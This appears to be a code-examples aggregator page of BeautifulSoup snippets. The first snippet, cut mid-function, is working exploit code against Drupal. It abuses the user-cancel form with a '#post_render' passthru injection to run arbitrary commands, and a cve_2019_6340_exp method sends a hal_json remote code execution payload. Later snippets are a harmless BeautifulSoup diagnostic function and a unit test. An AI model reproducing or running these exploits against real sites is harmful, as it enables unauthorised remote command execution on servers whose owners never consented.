                'pass': DRUPAL_P,
                'op': 'Log in'
            }
            self.session.post(self.url,
                              params=self.get_params,
                              data=self.post_params,
                              headers=self.headers,
                              timeout=self.timeout,
                              verify=False)
            self.get_params = {'q': 'user'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.user_id = self.soup.find('meta', {
                'property': 'foaf:name'
            }).get('about')
            if "?q=" in self.user_id:
                self.user_id = self.user_id.split("=")[1]
            self.get_params = {'q': self.user_id + '/cancel'}
            self.r = self.session.get(self.url,
                                      params=self.get_params,
                                      headers=self.headers,
                                      timeout=self.timeout,
                                      verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_token = self.form.find('input', {
                'name': 'form_token'
            }).get('value')
            self.get_params = {
                'q':
                self.user_id + '/cancel',
                'destination':
                self.user_id +
                '/cancel?q[%23post_render][]=passthru&q[%23type]=markup&q[%23markup]='
                + cmd
            }
            self.post_params = {
                'form_id': 'user_cancel_confirm_form',
                'form_token': self.form_token,
                '_triggering_element_name': 'form_id',
                'op': 'Cancel account'
            }
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.soup = BeautifulSoup(self.r.text, "html.parser")
            self.form = self.soup.find('form',
                                       {'id': 'user-cancel-confirm-form'})
            self.form_build_id = self.form.find('input', {
                'name': 'form_build_id'
            }).get('value')
            self.get_params = {
                'q':
                'file/ajax/actions/cancel/#options/path/' + self.form_build_id
            }
            self.post_params = {'form_build_id': self.form_build_id}
            self.r = self.session.post(self.url,
                                       params=self.get_params,
                                       data=self.post_params,
                                       headers=self.headers,
                                       timeout=self.timeout,
                                       verify=False)
            self.raw_data = dump.dump_all(self.r).decode('utf-8', 'ignore')
            verify.exploit_print(self.r.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

    def cve_2019_6340_exp(self, cmd):
        vul_name = "Drupal: CVE-2019-6340"
        self.path = "/node/?_format=hal_json"
        self.cmd_len = len(cmd)
        self.payload = self.payload_cve_2019_6340 % (self.cmd_len, cmd,
                                                     self.url)
        self.headers = {
            'User-Agent': self.ua,
            'Connection': "close",
            'Content-Type': "application/hal+json",
            'Accept': "*/*",
            'Cache-Control': "no-cache"
        }
        try:
            request = requests.post(self.url + self.path,
                                    data=self.payload,
                                    headers=self.headers,
                                    timeout=self.timeout,
                                    verify=False)
            self.raw_data = dump.dump_all(request).decode('utf-8', 'ignore')
            verify.exploit_print(request.text, self.raw_data)
        except requests.exceptions.Timeout:
            verify.timeout_print(vul_name)
        except requests.exceptions.ConnectionError:
            verify.connection_print(vul_name)
        except Exception:
            verify.error_print(vul_name)

Example #18

0

Show file

def diagnose(data):
    """Diagnostic suite for isolating common problems.

    :param data: A string containing markup that needs to be explained.
    :return: None; diagnostics are printed to standard output.
    """
    print("Diagnostic running on Beautiful Soup %s" % __version__)
    print("Python version %s" % sys.version)

    basic_parsers = ["html.parser", "html5lib", "lxml"]
    for name in basic_parsers:
        for builder in builder_registry.builders:
            if name in builder.features:
                break
        else:
            basic_parsers.remove(name)
            print((
                "I noticed that %s is not installed. Installing it may help." %
                name))

    if 'lxml' in basic_parsers:
        basic_parsers.append("lxml-xml")
        try:
            from lxml import etree
            print("Found lxml version %s" %
                  ".".join(map(str, etree.LXML_VERSION)))
        except ImportError as e:
            print("lxml is not installed or couldn't be imported.")

    if 'html5lib' in basic_parsers:
        try:
            from thirdparty import html5lib
            print("Found html5lib version %s" % html5lib.__version__)
        except ImportError as e:
            print("html5lib is not installed or couldn't be imported.")

    if hasattr(data, 'read'):
        data = data.read()
    elif data.startswith("http:") or data.startswith("https:"):
        print('"%s" looks like a URL. Beautiful Soup is not an HTTP client.' %
              data)
        print(
            "You need to use some other library to get the document behind the URL, and feed that document to Beautiful Soup."
        )
        return
    else:
        try:
            if os.path.exists(data):
                print(
                    '"%s" looks like a filename. Reading data from the file.' %
                    data)
                with open(data) as fp:
                    data = fp.read()
        except ValueError:
            # This can happen on some platforms when the 'filename' is
            # too long. Assume it's data and not a filename.
            pass
        print()

    for parser in basic_parsers:
        print("Trying to parse your markup with %s" % parser)
        success = False
        try:
            soup = BeautifulSoup(data, features=parser)
            success = True
        except Exception as e:
            print("%s could not parse the markup." % parser)
            traceback.print_exc()
        if success:
            print("Here's what %s did with the markup:" % parser)
            print(soup.prettify())

        print("-" * 80)

Example #19

0

Show file

File: test_soup.py Project: mohinparamasivam/Cloudmare

 def test_no_warning_if_explicit_parser_specified(self):
     with warnings.catch_warnings(record=True) as w:
         soup = BeautifulSoup("<a><b></b></a>", "html.parser")
     self.assertEqual([], w)